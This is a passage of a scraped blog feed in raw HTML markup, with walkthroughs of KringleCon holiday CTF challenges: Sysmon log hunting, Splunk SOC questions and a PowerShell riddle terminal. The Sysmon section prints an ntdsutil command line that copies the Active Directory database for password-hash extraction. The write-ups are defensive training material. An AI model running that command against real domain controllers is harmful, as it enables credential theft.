XKXXXXXXXXXXXXXXXXXXXXNNWWNWd&lt;span class="p">;&lt;/span>:::&lt;span class="p">;;;&lt;/span>:0NNNNNNNNNXO&lt;span class="p">;&lt;/span>,,,,,,,:0NN0XNXNXXXXXXXXXXXKKXKKX
NXXXXXXXXXXXXXXXXXXXXXNNNNNNNl:::&lt;span class="p">;;&lt;/span>:KNNNNNNNNNNO&lt;span class="p">;&lt;/span>,,,,,,&lt;span class="p">;&lt;/span>xNNK0NXNXXNXXXXXXKXXKKKKXKK
XXNNXNNNXXXXXXXXXXXXXNNNNNNNNNkl:&lt;span class="p">;;&lt;/span>xWWNNNNNWWWk&lt;span class="p">;;;;;;;&lt;/span>xNNKKXNXNXXNXXXXXXXXXXXKXKKXK
XXXXXNNNNXNNNNXXXXXXNNNNNNNNNNNNKkolKNNNNNNNNx&lt;span class="p">;;;;;&lt;/span>lkNNXNNNNXXXNXXNXXXXXXXXXXXKKKKX
XXXXXXXXXXXNNNNNNNNNNNNNNNNNNNNNNNNNKXNNNNWNo:clxOXNNNNNNNNXNXXXXXXXXXXXXXXXKKXKKKK
XXXXNXXXNXXXNXXNNNNNWWWWWNNNNNNNNNNNNNNNNNWWNWWNWNNWNNNNNNNNXXXXXXNXXXXXXXXXXKKXKKX
XNXXXXNNXXNXXNNXNXNWWWWWWWWWNNNNNNNNNNNNNWWWWNNNNNNNNNNNNNNNNNNNNNXNXXXXNXXXXXXKXKK
XXXXNXXNNXXXNXXNXXNWWWNNNNNNNNNWWNNNNNNNNWWWWWWNWNNNNNNNNNNNNNNNXXNXNXXXXNXXXXKXKXK
I need to list files in my home/
To check on project logos
But what I see with ls there,
Are quotes from desert hobos...
which piece of my &lt;span class="nb">command&lt;/span> does fail?
I surely cannot find it.
Make straight my path and locate that-
I&lt;span class="s1">&amp;#39;ll praise your skill and sharp wit!
&lt;/span>&lt;span class="s1">Get a listing (ls) of your current directory.
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">elf@b0b213fcf787:~$ ls
&lt;/span>&lt;span class="s1">This isn&amp;#39;&lt;/span>t the ls you&lt;span class="s1">&amp;#39;re looking for
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">elf@b0b213fcf787:~$ which ls
&lt;/span>&lt;span class="s1">/usr/local/bin/ls
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">elf@b0b213fcf787:~$ /bin/ls &amp;lt;&amp;lt; call the original ls directly to solve it
&lt;/span>&lt;span class="s1">&amp;#39;&lt;/span> &lt;span class="err">&amp;#39;&lt;/span> rejected-elfu-logos.txt
Loading, please wait......
You did it! Congratulations!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>A rather simple solution, but don&amp;rsquo;t worry, it will get a bit harder as you progress&amp;hellip; Now, if you go back and click on Mary a few times, she will reveal the hints for solving this objective:&lt;/p>
&lt;blockquote>
&lt;p>Oh there they are! Now I can delete them. Thanks!
Have you tried the Sysmon and EQL challenge?
If you aren&amp;rsquo;t familiar with Sysmon, Carlos Perez has some great info about it.
Haven&amp;rsquo;t heard of the Event Query Language?
Check out some of Ross Wolf&amp;rsquo;s work on EQL or that blog post by Josh Wright in your badge.&lt;/p>
&lt;/blockquote>
&lt;p>Link for EQL: &lt;a href="https://www.endgame.com/our-experts/ross-wolf">https://www.endgame.com/our-experts/ross-wolf&lt;/a>&lt;/p>
&lt;h2 id="main-objective">Main Objective&lt;/h2>
&lt;p>While the provided hint about EQL was interesting, I could not directly use it to solve this challenge. Instead I went on a different route. Since the goal is to identify a tool being used to extract password hashes from lsass.exe, I parsed the JSON file with the Sysmon logs with &lt;code>jq&lt;/code> and then filtered for the &lt;strong>command_line&lt;/strong> looking for .exe files.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">$ cat sysmon-data.json &lt;span class="p">|&lt;/span> jq &lt;span class="s1">&amp;#39;.[].command_line&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> grep &lt;span class="s1">&amp;#39;.exe&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> uniq &lt;span class="p">|&lt;/span> wc -l
&lt;span class="m">196&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>196 is still rather large number to try, so then I decided to search on the net for &lt;strong>extracting domain password&lt;/strong> and one of the first few articles pointed me to a utility called NTDS. I searched for this in the logs and the answer presented itself right away: &lt;strong>ntdsutil&lt;/strong> which is the solution for Objective #4:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">$ cat sysmon-data.json &lt;span class="p">|&lt;/span> jq &lt;span class="s1">&amp;#39;.[].command_line&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> grep &lt;span class="s1">&amp;#39;ntdsutil.exe&amp;#39;&lt;/span>
&lt;span class="s2">&amp;#34;ntdsutil.exe \&amp;#34;ac i ntds\&amp;#34; ifm \&amp;#34;create full c:\\hive\&amp;#34; q q&amp;#34;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div></description></item><item><title>Splunk Challenge</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective6/</link><pubDate>Thu, 24 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective6/</guid><description>&lt;p>&lt;img src="../images/obj6/objective6.png" alt="Objective6">&lt;/p>
&lt;p>After solving the HID Lock challenge, I continue solving the objectives as Santa with some special privileges. I can access various systems that was only possible for Santa before, like the Splunk terminal in the &lt;code>Great Room&lt;/code> which used to be locked with the following error message &lt;code>The Splunk terminal is for Santa and select SOC elves only&lt;/code>&amp;hellip;&lt;/p>
&lt;p>&lt;img src="../images/obj6/great-room.png" alt="Great Room">&lt;/p>
&lt;p>Unfortunately there are no more hints from the elves, only warnings and panic:&lt;/p>
&lt;blockquote>
&lt;p>Hey Santa, there’s some crazy stuff going on that we can see through our Splunk infrastructure. You better login and see what’s up.&lt;/p>
&lt;/blockquote>
&lt;p>Next I click the terminal on the table which opens Splunk in a
&lt;a href="https://splunk.kringlecastle.com/en-US/app/SA-kringleconsoc/kringleconsoc" target="_blank" rel="noopener">new tab&lt;/a> with the goal of figuring out the answer to the next objective:&lt;/p>
&lt;p>&lt;img src="../images/obj6/splunk-soc.png" alt="Spliunk SOC">&lt;/p>
&lt;p>Thankfully it has a very nice chat interface where &lt;code>Alice Bluebird&lt;/code> helps out with hints for the first few training questions:s&lt;/p>
&lt;h4 id="question-1">Question 1&lt;/h4>
&lt;p>&lt;strong>How many distinct MITRE ATT&amp;amp;CK techniques did Alice emulate?&lt;/strong>&lt;/p>
&lt;p>Alice provides the first part of a handy splunk query to find that the answer is &lt;code>13&lt;/code>:&lt;/p>
&lt;pre>&lt;code>| tstats count where index=* by index
| search index=T*-win OR T*-main
| rex field=index &amp;quot;(?&amp;lt;technique&amp;gt;t\d+)[\.\-].0*&amp;quot;
| stats dc(technique)
&lt;/code>&lt;/pre>&lt;h4 id="question-2">Question 2&lt;/h4>
&lt;p>&lt;strong>What are the names of the two indexes that contain the results of emulating Enterprise ATT&amp;amp;CK technique 1059.003? (Put them in alphabetical order and separate them with a space)&lt;/strong>&lt;/p>
&lt;p>This was also rather easy to answer: &lt;code>t1059.003-main t1059.003-win&lt;/code>&lt;/p>
&lt;h4 id="question-3">Question 3&lt;/h4>
&lt;p>&lt;strong>One technique that Santa had us simulate deals with &amp;lsquo;system information discovery&amp;rsquo;. What is the full name of the registry key that is queried to determine the MachineGuid?&lt;/strong>&lt;/p>
&lt;p>A simple search in Splunk for &lt;code>index=* MachineGuid&lt;/code> reveals entries such as &lt;strong>REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid&lt;/strong> which quickly provides the answer: &lt;code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography&lt;/code>&lt;/p>
&lt;h4 id="question-4">Question 4&lt;/h4>
&lt;p>&lt;strong>According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp)&lt;/strong>&lt;/p>
&lt;p>Following a similar logic, I searched for &lt;code>index=* OSTAP&lt;/code> in splunk, which retrieved 8 results. Then I scrolled down to the bottom to find the oldest one and submitted its timestamp as answer: &lt;code>2020-11-30T17:44:15Z&lt;/code>&lt;/p>
&lt;h4 id="question-5">Question 5&lt;/h4>
&lt;p>&lt;strong>One Atomic Red Team test executed by the Attack Range makes use of an open source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?&lt;/strong>&lt;/p>
&lt;p>For this one I had to try a bit harder, but some time spent looking at the &lt;strong>frgnca&lt;/strong> github repo, I figured that it had to do something with Audio, so I crafter this query in Splunk &lt;code>index=* EventCode=1 AND CommandLine=&amp;quot;*Audio*&amp;quot;&lt;/code> which helped retrieve the correct answer: &lt;code>3648&lt;/code>&lt;/p>
&lt;h4 id="question-6">Question 6&lt;/h4>
&lt;p>&lt;strong>Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?&lt;/strong>&lt;/p>
&lt;p>This question probably took me the longest to figure out. I&amp;rsquo;ve spent about 2 hours looking for information in Splunk, and what eventually unblocked me was reading the question over and over again until I realized that the answer will come only partially from Splunk. Eventually I solved it by searching for any occurrence of &lt;code>*.bat&lt;/code> files in Splunk, which helped me find
&lt;a href="https://github.com/redcanaryco/atomic-red-team/blob/8eb52117b748d378325f7719554a896e37bccec7/atomics/T1074.001/src/Discovery.bat" target="_blank" rel="noopener">Discovery.bat&lt;/a> from the Red Canary
&lt;a href="https://github.com/redcanaryco/atomic-red-team" target="_blank" rel="noopener">repo&lt;/a>, which was used to create the simulation. The answer was the final line in this batch script: &lt;code>quser&lt;/code>&lt;/p>
&lt;h4 id="question-7">Question 7&lt;/h4>
&lt;p>&lt;strong>According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?&lt;/strong>&lt;/p>
&lt;p>This was a rather easy one, I searched for &lt;code>index=* SERIAL&lt;/code> in Splunk which revealed several records. Right on top the first one had the answer: &lt;code>55FCEEBB21270D9249E86F4B9DC7AA60&lt;/code>&lt;/p>
&lt;h3 id="final-question">Final Question&lt;/h3>
&lt;p>&lt;strong>What is the name of the adversary group that Santa feared would attack KringleCon?&lt;/strong>&lt;/p>
&lt;p>For this final question Alice provided a base64 encoded cipher text that according to her was encrypted with Santa&amp;rsquo;s favourite phrase.&lt;/p>
&lt;blockquote>
&lt;p>&lt;code>7FXjP1lyfKbyDK/MChyf36h7&lt;/code>&lt;/p>
&lt;/blockquote>
&lt;p>What&amp;rsquo;s more, she even suggested that the encryption key was mentioned during the KringleCon
&lt;a href="https://www.youtube.com/watch?v=RxVgEFt08kU" target="_blank" rel="noopener">Talk&lt;/a> by Dave Herrald on &lt;strong>Adversary Emulation and Automation&lt;/strong>. I fast-forwarded to the end to find this slide:&lt;/p>
&lt;p>&lt;img src="../images/obj6/stay-frosty.png" alt="Stay Frosty">&lt;/p>
&lt;p>The choice of RC4 cipher was almost obvious, after reading Alice&amp;rsquo;s hint in Splunk SOC Chat:&lt;/p>
&lt;blockquote>
&lt;p>It&amp;rsquo;s encrypted with an old algorithm that uses a key. We don&amp;rsquo;t care about RFC 7465 up here! I leave it to the elves to determine which one!&lt;/p>
&lt;/blockquote>
&lt;p>Armed with this knowledge, I used
&lt;a href="https://gchq.github.io/CyberChef/" target="_blank" rel="noopener">CyberChef&lt;/a> and the uncovered passphrase to uncover the name of the adversary group.&lt;/p>
&lt;p>&lt;img src="../images/obj6/adversary-group.png" alt="Adversary Group - CyberChef">&lt;/p>
&lt;p>&lt;img src="../images/obj6/splunk-done.png" alt="Splunk Done">&lt;/p>
&lt;p>On to the next one! 😎&lt;/p></description></item><item><title>Network Log Analysis - Determine Compromised System</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective5/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective5/</guid><description>&lt;h2 id="zeek-them-logs">Zeek them logs!&lt;/h2>
&lt;p>Instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>The attacks don&amp;rsquo;t stop!
Can you help identify the IP address of the malware-infected system using these Zeek logs?
For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry.&lt;/p>
&lt;/blockquote>
&lt;p>Link to Zeek
&lt;a href="https://downloads.elfu.org/sysmon-data.json.zip" target="_blank" rel="noopener">logs&lt;/a> which weigh around 300 MB (1.4 GB uncompressed).&lt;/p>
&lt;h2 id="technical-challenge">Technical Challenge&lt;/h2>
&lt;p>Before attacking the Zeek logs, you can look for Sparkle Redberry in the Laboratory for some hints on the main objective. But as usual, you need to help him first with a laser device that&amp;rsquo;s normally generating Xmas Cheers but is now malfunctioning:&lt;/p>
&lt;p>&lt;img src="../images/obj5-sparkle.png" alt="Sparkle Redberry">&lt;/p>
&lt;blockquote>
&lt;p>I&amp;rsquo;m Sparkle Redberry and Imma chargin&amp;rsquo; my laser!
Problem is: the settings are off.
Do you know any PowerShell?
It&amp;rsquo;d be GREAT if you could hop in and recalibrate this thing.
It spreads holiday cheer across the Earth &amp;hellip;
&amp;hellip; when it&amp;rsquo;s working!&lt;/p>
&lt;/blockquote>
&lt;p>So now it&amp;rsquo;s time to dive into the PowerShell terminal sitting on the table, which controls the laser hardware. When you open the terminal you see the below banner:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PowerShell 6.2.3
Copyright &lt;span class="o">(&lt;/span>c&lt;span class="o">)&lt;/span> Microsoft Corporation. All rights reserved.
https://aka.ms/pscore6-docs
Type &lt;span class="s1">&amp;#39;help&amp;#39;&lt;/span> to get help.
🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲
🗲 🗲
🗲 Elf University Student Research Terminal - Christmas Cheer Laser Project 🗲
🗲 ------------------------------------------------------------------------------ 🗲
🗲 The research department at Elf University is currently working on a top-secret 🗲
🗲 Laser which shoots laser beams of Christmas cheer at a range of hundreds of 🗲
🗲 miles. The student research team was successfully able to tweak the laser to 🗲
🗲 JUST the right settings to achieve &lt;span class="m">5&lt;/span> Mega-Jollies per liter of laser output. 🗲
🗲 Unfortunately, someone broke into the research terminal, changed the laser 🗲
🗲 settings through the Web API and left a note behind at /home/callingcard.txt. 🗲
🗲 Read the calling card and follow the clues to find the correct laser Settings. 🗲
🗲 Apply these correct settings to the laser using it&lt;span class="err">&amp;#39;&lt;/span>s Web API to achieve laser 🗲
🗲 output of &lt;span class="m">5&lt;/span> Mega-Jollies per liter. 🗲
🗲 🗲
🗲 Use &lt;span class="o">(&lt;/span>Invoke-WebRequest -Uri http://localhost:1225/&lt;span class="o">)&lt;/span>.RawContent &lt;span class="k">for&lt;/span> more info. 🗲
🗲 🗲
🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲
&lt;/code>&lt;/pre>&lt;/div>&lt;p>You can see some really good hints straight away. Your main task is to calibrate the laser, so that it emits at least &lt;strong>5 Mega-Jollies&lt;/strong> of &lt;strong>Xmas Cheer&lt;/strong>. In order to calibrate it we can change its &lt;code>angle&lt;/code>, the &lt;code>temperature&lt;/code>, the &lt;code>refraction&lt;/code> and various compositions of &lt;code>gases&lt;/code> inside. For the full instructions execute the command in the banner:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; &lt;span class="o">(&lt;/span>Invoke-WebRequest -Uri http://localhost:1225/&lt;span class="o">)&lt;/span>.RawContent
HTTP/1.0 &lt;span class="m">200&lt;/span> OK
Server: Werkzeug/0.16.0
Server: Python/3.6.9
Date: Sat, &lt;span class="m">28&lt;/span> Dec &lt;span class="m">2019&lt;/span> 21:20:38 GMT
Content-Type: text/html&lt;span class="p">;&lt;/span> &lt;span class="nv">charset&lt;/span>&lt;span class="o">=&lt;/span>utf-8
Content-Length: &lt;span class="m">860&lt;/span>
...
----------------------------------------------------
Christmas Cheer Laser Project Web API
----------------------------------------------------
Turn the laser on/off:
GET http://localhost:1225/api/on
GET http://localhost:1225/api/off
Check the current Mega-Jollies of laser output
GET http://localhost:1225/api/output
Change the lense refraction value &lt;span class="o">(&lt;/span>1.0 - 2.0&lt;span class="o">)&lt;/span>:
GET http://localhost:1225/api/refraction?val&lt;span class="o">=&lt;/span>1.0
Change laser temperature in degrees Celsius:
GET http://localhost:1225/api/temperature?val&lt;span class="o">=&lt;/span>-10
Change the mirror angle value &lt;span class="o">(&lt;/span>&lt;span class="m">0&lt;/span> - 359&lt;span class="o">)&lt;/span>:
GET http://localhost:1225/api/angle?val&lt;span class="o">=&lt;/span>45.1
Change gaseous elements mixture:
POST http://localhost:1225/api/gas
POST BODY EXAMPLE &lt;span class="o">(&lt;/span>gas mixture percentages&lt;span class="o">)&lt;/span>:
&lt;span class="nv">O&lt;/span>&lt;span class="o">=&lt;/span>5&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">H&lt;/span>&lt;span class="o">=&lt;/span>5&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">He&lt;/span>&lt;span class="o">=&lt;/span>5&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">N&lt;/span>&lt;span class="o">=&lt;/span>5&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">Ne&lt;/span>&lt;span class="o">=&lt;/span>20&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">Ar&lt;/span>&lt;span class="o">=&lt;/span>10&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">Xe&lt;/span>&lt;span class="o">=&lt;/span>10&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">F&lt;/span>&lt;span class="o">=&lt;/span>20&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">Kr&lt;/span>&lt;span class="o">=&lt;/span>10&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">Rn&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">10&lt;/span>
----------------------------------------------------
...
&lt;/code>&lt;/pre>&lt;/div>&lt;p>When I first tried to calibrate the laser, I naively thought I can just enter some random numbers and see if I can reach the desired amount of Mega-Jollies by trial and error / brute forcing. But after 10 minutes of messing with the laser parameters, I had to admit that this was not going to work. So then I read the banner again and started following the hints.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; get-content /home/callingcard.txt
What&lt;span class="s1">&amp;#39;s become of your dear laser?
&lt;/span>&lt;span class="s1">Fa la la la la, la la la la
&lt;/span>&lt;span class="s1">Seems you can&amp;#39;&lt;/span>t now seem to raise her!
Fa la la la la, la la la la
Could commands hold riddles in hist&lt;span class="s1">&amp;#39;ry?
&lt;/span>&lt;span class="s1">Fa la la la la, la la la la
&lt;/span>&lt;span class="s1">Nay! You&amp;#39;&lt;/span>ll ever suffer myst&lt;span class="err">&amp;#39;&lt;/span>ry!
Fa la la la la, la la la la
PS /home/elf&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This clue is pointing to the command history, so next I Googled how to see PowerShell command history and queried the terminal:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-History
Id CommandLine
-- -----------
&lt;span class="m">1&lt;/span> Get-Help -Name Get-Process
&lt;span class="m">2&lt;/span> Get-Help -Name Get-*
&lt;span class="m">3&lt;/span> Set-ExecutionPolicy Unrestricted
&lt;span class="m">4&lt;/span> Get-Service &lt;span class="p">|&lt;/span> ConvertTo-HTML -Property Name, Status &amp;gt; C:&lt;span class="se">\s&lt;/span>ervices.htm
&lt;span class="m">5&lt;/span> Get-Service &lt;span class="p">|&lt;/span> Export-CSV c:&lt;span class="se">\s&lt;/span>ervice.csv
&lt;span class="m">6&lt;/span> Get-Service &lt;span class="p">|&lt;/span> Select-Object Name, Status &lt;span class="p">|&lt;/span> Export-CSV c:&lt;span class="se">\s&lt;/span>ervice.csv
&lt;span class="m">7&lt;/span> &lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/angle?val&lt;span class="o">=&lt;/span>65.5&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="m">8&lt;/span> Get-EventLog -Log &lt;span class="s2">&amp;#34;Application&amp;#34;&lt;/span>
&lt;span class="m">9&lt;/span> I have many &lt;span class="nv">name&lt;/span>&lt;span class="o">=&lt;/span>value variables that I share to applications system wide. At a comma…
&lt;span class="m">10&lt;/span> &lt;span class="o">(&lt;/span>Invoke-WebRequest -Uri http://localhost:1225/&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="m">11&lt;/span> get-content /home/callingcard.txt
&lt;/code>&lt;/pre>&lt;/div>&lt;p>IDs #7 and ID #9 both seems interesting. For now we can assume that ID #7 holds the correct value for the angle! I then continued with ID #9 which seemed to have a truncated message. If only we could reveal the full version. Of course, after few google searches, I found just the command I needed.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Invoke-History -Id &lt;span class="m">9&lt;/span>
I have many &lt;span class="nv">name&lt;/span>&lt;span class="o">=&lt;/span>value variables that I share to applications system wide. At a &lt;span class="nb">command&lt;/span> I will reveal my secrets once you Get my Child Items.
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So hidden in the riddle was another riddle. The first sentence seems to suggest we need to look at &lt;strong>ENV&lt;/strong> variables, while the second sentence seems to suggest how to get to them. On to google searching again, then back to the terminal:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-ChildItem Env:
Name Value
---- -----
PWD /home/elf
riddle Squeezed and compressed I am hidden away. Expand me from my…
SHELL /home/elf/elf
... ...
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Here we see an environment variable named &lt;strong>riddle&lt;/strong> containing some further clues. However we need to find a way to expand it so its full content can be revealed. This can be done in numerous ways, one idea I got from my brother, who is a bigger PowerShell guru than I am, was to do the below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; &lt;span class="o">(&lt;/span>Get-ChildItem Env:&lt;span class="o">)[&lt;/span>-9&lt;span class="o">]&lt;/span>.Value
Squeezed and compressed I am hidden away. Expand me from my prison and I will show you the way. Recurse through all /etc and Sort on my LastWriteTime to reveal i&lt;span class="err">&amp;#39;&lt;/span>m the newest of all.
PS /home/elf&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So the content of the riddle env variable was now revealed, which seemed to suggest to continue looking in the /etc folder, where we should find the file which was modified most recently. Back to Google again, to do some searching, which gave the below commands:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-ChildItem -Recurse -Path /etc &lt;span class="p">|&lt;/span> Sort LastWriteTime
&lt;span class="o">[&lt;/span>... lots of output omitted &lt;span class="k">for&lt;/span> brievity...&lt;span class="o">]&lt;/span>
Directory: /etc/apt
Mode LastWriteTime Length Name
---- ------------- ------ ----
--r--- 12/28/19 9:46 PM &lt;span class="m">5662902&lt;/span> archive
PS /home/elf&amp;gt; Expand-Archive /etc/apt/archive -DestinationPath ./expanded
PS /home/elf&amp;gt; Get-ChildItem ./expanded/
Directory: /home/elf/expanded
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/28/19 9:53 PM refraction
PS /home/elf&amp;gt; Get-ChildItem ./expanded/refraction/
Directory: /home/elf/expanded/refraction
Mode LastWriteTime Length Name
---- ------------- ------ ----
------ 11/7/19 11:57 AM &lt;span class="m">134&lt;/span> riddle &lt;span class="s">&amp;lt;&amp;lt; further clue f&lt;/span>or temperature
------ 11/5/19 2:26 PM &lt;span class="m">5724384&lt;/span> runme.elf &lt;span class="s">&amp;lt;&amp;lt; refraction is hidden here&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This archive, when unpacked, revealed a folder named &lt;strong>refraction&lt;/strong> and within another hint plus the value for refraction. To get the value for refraction I had to somehow run the other file &lt;strong>runme.elf&lt;/strong>. I spent close to 2 hours trying to figure out how to call this file from PowerShell, when I had almost given up, and gave a final try by issuing &lt;code>chmod +x&lt;/code> and then running it as binary executable. Quite surprisingly this worked like a charm:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf/expanded/refraction&amp;gt; chmod +x ./runme.elf
PS /home/elf/expanded/refraction&amp;gt; ./runme.elf
refraction?val&lt;span class="o">=&lt;/span>1.867
PS /home/elf/expanded/refraction&amp;gt; Get-Content ./riddle
Very shallow am I in the depths of your elf home. You can find my entity by using my md5 identity:
25520151A320B5B0D21561F92C8F6224
PS /home/elf/expanded/refraction&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So there was the correct setting for the &lt;strong>refraction&lt;/strong> of the laser. Next I turned to the other file in the folder called &lt;strong>riddle&lt;/strong> and saw further clues. I noticed that it referred to &lt;strong>depths&lt;/strong>, which was a reference to the HOME directory which contained hundreds of text files in several levels of folders hierarchy. Somewhere in these depths was a file which had the md5 hash referenced in the riddle. To find it I issued the below command:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-ChildItem ./depths/*.txt -Recurse &lt;span class="p">|&lt;/span> Get-FileHash -Algorithm MD5 &lt;span class="p">|&lt;/span> Where-Object &lt;span class="nb">hash&lt;/span> -eq 25520151A320B5B0D21561F92C8F6224 &lt;span class="p">|&lt;/span> Select path
Path
----
/home/elf/depths/produce/thhy5hll.txt
PS /home/elf&amp;gt; Get-Content /home/elf/depths/produce/thhy5hll.txt
temperature?val&lt;span class="o">=&lt;/span>-33.5
I am one of many thousand similar txt&lt;span class="s1">&amp;#39;s contained within the deepest of /home/elf/depths. Finding me will give you the most strength but doing so will require Piping all the FullName&amp;#39;&lt;/span>s to Sort Length.
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The last missing piece of the laser puzzle was the correct composition of &lt;strong>gas&lt;/strong> compounds for the laser. There were no direct hints that I could find, however, I had the idea that perhaps the &lt;code>/home/elf/depths&lt;/code> folder may be holding more than just the &lt;strong>temperature&lt;/strong>. Next I did a search for the top 3 largest text files within this folder and found that the 2 largest text files are somewhat special. The largest was the one which contained the temperature, the second largest was another file with some further clues.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-ChildItem -Path ./depths/ -Recurse &lt;span class="p">|&lt;/span> Sort-Object Length -Descending &lt;span class="p">|&lt;/span> Select-Object length,name,directory -First &lt;span class="m">3&lt;/span> &lt;span class="p">|&lt;/span> Format-Table -AutoSize -Wrap
Length Name Directory
------ ---- ---------
&lt;span class="m">224&lt;/span> thhy5hll.txt /home/elf/depths/produce
&lt;span class="m">209&lt;/span> 0jhj5xz6.txt /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/u
nknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/t
ape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/bea
uty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main
/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/la
bor/sail/dropped/fox
&lt;span class="m">162&lt;/span> r9j67n1j.txt /home/elf/depths/larger/saddle/grown/correctly/allow/free/spoken/coffee
/sight/increase/steady/division/gas/available/pressure/wooden
&lt;/code>&lt;/pre>&lt;/div>&lt;p>As it can be seen, the 3rd largest file was noticeably smaller. I still checked its content, but there was nothing useful in it, so it was safe to assume that no other files were of any interest within the depths folder. So then I checked the contents of the &lt;code>0jhj5xz6.txt&lt;/code> buried deep within the &lt;code>depths&lt;/code> and found that it contained some pretty useful hint:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-Content /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt
Get process information to include Username identification. Stop Process to show me you&lt;span class="s1">&amp;#39;re skilled and in this order they must be killed:
&lt;/span>&lt;span class="s1"> bushy
&lt;/span>&lt;span class="s1"> alabaster
&lt;/span>&lt;span class="s1"> minty
&lt;/span>&lt;span class="s1"> holly
